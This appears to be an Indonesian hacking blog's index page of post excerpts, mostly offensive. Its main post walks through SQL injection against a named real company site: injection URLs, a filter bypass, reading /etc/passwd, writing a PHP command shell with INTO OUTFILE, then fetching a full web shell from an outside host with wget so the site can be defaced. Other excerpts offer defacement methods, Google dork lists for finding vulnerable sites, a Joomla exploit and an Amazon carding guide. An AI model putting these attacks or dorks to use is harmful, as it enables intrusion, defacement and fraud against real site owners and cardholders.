Tutorial Mudah SQL Injection Manual

Pengertian SQL Injection 
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : 

id=$id;. > Got Error
Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak,

Related Posts:

---

Teknik-Teknik Hacking Website

Cara cara seoarang hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut.


Teknik-teknik Hacking Website:

IP Spoofing
FTP Attack
Unix Finger Exploits
Flooding & Broadcasting
Fragmented Packet Attacks
E-mail Exploits
DNS and BIND Vulnerabilities
Password Attacks
Proxy Server Attacks
Remote Command Processing Attacks
Remote File System Attack
Selective Program

Related Posts:

---

Tutorial Membuat Localhost dengan XAMPP di Laptop atau PC

Localhost atau juga bisa disebut sebagai server local merupakan web server yang bersifat offline. Sama halnya seperti web server yang di internet, di localhost kita dapat membuat website sebanyak mungkin tanpa koneksi internet. Dan fiturnya pun juga saya rasa gak jauh beda sama yang di internet. Misal ada PhpMyAdmin, PHP, MySQL, dll.Oke langsung aja ya, pertama download dulu XAMPP DISINISetelah

Related Posts:

---

Tutorial Terbaru Install Mozilla Firefox di Kali Linux

Mozilla Firefox adalah web browser gratis dan open-source yang dikembangkan untuk Windows, OS X, dan Linux, dengan versi mobile untuk Android, oleh Mozilla Corporation dan anak perusahaan, Mozilla Corporation. Firefox menggunakan mesin Gecko layout untuk membuat halaman web, yang mengimplementasikan standar web saat ini.


Introduction Firefox
Pada Juli 2013, Firefox memiliki antara 16% dan 21%

Related Posts:

---

Cara Terbaru Membuat Account SSH Support SSL

Cara Terbaru Membuat Account SSH



Tutorial Membuat Akun SSH Support SSL:
1. Kunjungi link disamping ini, https://sshocean.com/create-account-in-sshforssl atau KLIK DISINI
2. Kemudian cari server yang belum full


Cara Terbaru Membuat Account SSH


3. Kemudian kalian isi Username dan Password kalian


Cara Terbaru Membuat Account SSH

4. Jika sudah selesai maka akan muncul tulisan hasilnya

Related Posts:

---

Upload Shell SQLi Into Out File

Hy Sobat ^_^ Udah lama nih ga nge-post lagi :V

Berhubung Kemaren ada temen yang rewel banget minta dibuatin Tutorial ini maka disini ane akan menunjukkan bagaimana cara mengunggah shell pada suatu webiste dengan SQL Injection tanpa harus menjadi admin, langsung saja berikut ini adalah langkah - langkahnya :

1) Kita cari target yang vuln SQLi dulu, di sini saya sudah mendapatkan 1 target yaitu http://www.vaksindo.co.id/ test target dengan menambahkan tanda ' pada parameter SQL nya ..

2) jika error maka akan muncul tulisan "Error My SQL bla bla.." atau sebagian konten ada yang hilang seperti dalam contoh ini ..

3) sekarang kita lakukan order by untuk menemukan jumlah table. 

http://www.vaksindo.co.id/vaksindo/views.php?page=1&id=1%27+order+by+1--+&lang=id&p=produk-kami
http://www.vaksindo.co.id/vaksindo/views.php?page=1&id=1%27+order+by+2--+&lang=id&p=produk-kami
http://www.vaksindo.co.id/vaksindo/views.php?page=1&id=1%27+order+by+3--+&lang=id&p=produk-kami
lakukan hingga error ( Tulisan Hilang ) Kembali

4) ternyata di sini trdapat 19 table, selanjutnya kita union+select untuk menemukan table yang bisa di injeksi

5) Owh.. ternyata Aksi kita di blok oleh server, kita bisa membypass nya dengan mengganti union menjadi /*!12345union*/

6) yaaappss udh ga di blok :D tapi mana? nomer tablenya kok ga muncul? o.O
hhaha jangan kuatir, untuk memunculkannya tambahkan +and+0 di belakang ID parameter.

7) nah tuh kita udh dapet nomer nya yaitu 3 , nomer ini lah yang nanti kita gunakan untuk mengeksekusi perintah" SQLi, sekarang kita cek dulu file_priv nya untuk mengetahui apakah kita bisa mengupload shell atau tidak menggunakan SQLi. Ganti angka 3 tadi dengan file_priv dan tambahkan +from+mysql.user sebelum tanda --+

8) yaak kita mendapatkan jawaban Y yang berarti kita bisa mengupload shell melalui SQL Injection :D selanjutnya kita mencoba untuk me-load file /etc/passwd yang ada di server dengan perintah load_file('/etc/passwd') > Letakkan pada angka 3 tadi dan jangan lupa hapus
string "+from+mysql.user" terlebih dahulu

kita dapat :
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin pulse:x:497:496:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:496:493:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin admin:x:500:500:administrator:/home/admin:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ayu:x:502:503::/home/ayu:/bin/bash vaksindo:x:504:505::/var/www/html/vaksindo:/sbin/nologin japfa4kids:x:505:506::/var/www/html/japfa4kids:/sbin/nologin Administrator:x:506:507::/var/www/html/:/sbin/nologin admincorporate:x:507:508::/var/www/html/corporate/:/bin/bash admincatalog:x:508:509::/var/www/html/ecatalog/:/bin/bash

9) di file ini kita bisa mencari folder" yang sekiranya bisa kita jadikan tempat memasang shell kita. di sini saya menemukan /var/www/html/vaksindo sebagai folder tempat penyimpanan file" website ini, langkah ini lah yang paling sulit ketika SQLi Into Out File.

10) Langkah selanjutnya yakni memasang shell command sederhana yang berisi <?include($_GET["cmd']);?> namun harus diconvert dahulu menjadi bentuk hex 0x3c3f7068702073797374656d28245f4745545b636d645d293b3f3e
tambahkan hex tersebut pada angka 3 tadi dan tmbahkan string ini sebelum --+
+INTO+OUTFILE+'directory_web_yang_writable/namashellente.php

contoh :
+INTO+OUTFILE+'/var/www/html/vaksindo/foto_berita/pescyte.php'

11) Sekarang kita buka shell kita.

12) loh kok shellnya cuman angka gitu? o.O hhehee santai, namanya juga shell sederhana, jadi fungsinya di umpetin :v cara memasang shellnya yaitu tambahkan perintah berikut setelah meong.php:
?cmd=wget alamatshell.txt
contoh : ?cmd=wget http://ppsd-files.pe.hu/v2.txt

13) lalu dilanjutkan dengan perintah :
?cmd=mv v2.txt anon.php

14) Langkah terakhir, kita buka shell kita yang asli.

Binggoooo :D kita sudah berhasil mengupload shell kita :D dan terserah mau apain tuh website :v kalo mau Deface, Ane titip nick sama Team aja deh :v => TN72  dan GARUDA TERSAKTI 72 <=

Sekian dan terimakasih sudah berkunjung dan membaca~

Related Posts:

---

Tutorial Deface Metode Com_Fabrik dan Cara Tebas index Web Orang Menggunakan Android

Tutorial Deface Metode Com_Fabrik dan Cara Tebas index Web Orang Menggunakan Android



========================================

Dork & Exploit : DOWNLOAD

.htaccess : DOWNLOAD

CSRF : DOWNLOAD

Script Deface : DOWNLOAD

========================================



Cara Deface Metode Com_Fabrik dan Cara Tebas index Web :

1. Dorking terlebih dahulu dengan dork yang sudah didownload (link ada

Related Posts:

---

Cara Terbaru Carding Amazon Menggunakan Android

Carding Amazon menggunakan andori



Kebanyakan Carding atau carder menggunakan Pc atau laptop tapi tenang saja, Karena kali ini admin noob1t4 akan berbagi cara carding diamazon menggunakan android.



Tutorial Carding ini versi PDF atau E-book jadi kalian bisa mempelajarinya secara offline tanpa membuka Web.



Ebook Carding Amazon menggunakan Android : DOWNLOAD



Creadit ebook carding amazon

Related Posts:

---

Tutorial Mudah Deface CMS Joomla dengan Exploit Com_Users

Teknik com_users ini prinsip kerjanya adalah halaman yang digunakan untuk mendaftar sebagai admin pada situs joomla. Bug com_users banyak ditemukan pada joomla versi 1.6 dan 1.7.

Gunakan dork dibawah ini di google.

inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br
site:com inurl:Home Page Beez joomla 1.6 index.php

Related Posts:

---

List Dork Bypass Admin Fresh

Kumpulan Dork Bypass Admin



Dork ini saya share khusus untuk untuk para defacer bypass admin, daftar dork yang saya share ini berjumlah 100 dork. Sedikit si, tapi kalo di dorking satu-satu juga capek :v



Daftar Kumpulan Dork Bypass Admin Fresh :


site:in & site:uk inurl:/admin/index.php

intitle:"login" /login.php

intext:"Parent Directory" inurl:/admin/upload

site:id /admin/uploads

Related Posts:

---

Aplikasi Olahraga Fitness di Smarthphone Terbaik di Tahun ini

Aplikasi Olahraga Fitness di Smarthphone

Orang dapat menemukan Technology support yang berguna untuk membantu orang-orang dengan aktivitas sehari-hari mereka. Tentu saja baru-baru ini ada lebih banyak orang yang memperhatikan untuk kesehatan dan kebugaran mereka. Mereka bisa menjadi sangat sibuk sehingga mereka tidak memiliki terlalu banyak waktu yang dapat dihabiskan untuk memperhatikan

Related Posts:

---

Subdomain Website Poltekkes Palangkaraya di sambangi Defacer

Subdomain Website Poltakes Palangkaraya


Rabu, 15 Agustus 2018 subdomain website Poltekkes Palangkaraya disambangi Defacer.

Sampai berita ini diterbitkan belum ada perbaikan di subdomain website tersebut.

Defacer menggunakan nick Mr.D404


Daftar Subdomain website Poltakkes Palangkaraya yang terdeface :


http://adak.poltekkes-palangkaraya.ac.id
http://alumni.poltekkes-palangkaraya.ac.id

Related Posts:

---

Rekomendasi Aplikasi Antivirus Terbaik Untuk Android di Dunia

Aplikasi antivirus di Android os tetap menjadi salah 1 jenis yang paling diminati dari aplikasi di GooglePlaystore. Karena OS android telah menembus pasaran global malahan hampir menyaingi ketenaran home windows pc. Inilah yang menyebabkan Android sangat rentang terkena malware karena banyak Hacker diluaran sana yang mengincar salah satu pengguna android os terjerumus ke perangkap yang mereka

Related Posts:

---

Cara Mudah Deface Metode XSS Vulnerability (Cross Site Scripting)

XSS atau kepanjangan dari Cross Site Scripting merupakan teknik Hacking Injeksi Code (Code Injection Attack), yaitu seorang attacker menginjeksi atau memasukan kode ke HTML atau JavaScript, DLL selanjutnya akan di eksekusi oleh client.


Dork: inurl:"/showcatrows.php?CategoryID="

Tutorial Deface Metode XSS Vulnerability (Cross Site Scripting) 
1. Gunakan dork diatas untuk mencari target di

Related Posts:

---

8K Dork SQL injection Fresh

8k dork sqli fresh


Sebelumnya saya berbagi Dork Carding terbaru 2018 sekarang saya akan berbagi 8000 ribu dork fresh, dork berjumlah 8k atau 8000 ribu ini dork sql injection lumayan lah buat menuh menuhin list dork di Harddisk. :v

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=

Related Posts:

---

Kumpulan Script Deface Terkeren Sepanjang Masa

Saking banyaknya Defacer di indonesia berbagai tampilan script deface pun berbeda beda, ada yang curhat, ada yang bertuliskan hacked dan ada banyak lagi script deface dengan berbagai tampilan-tampilan yang bagus.


Script Deface Terkeren



1. By Mr.x0x





Code HTML nya disini



CODE HERE///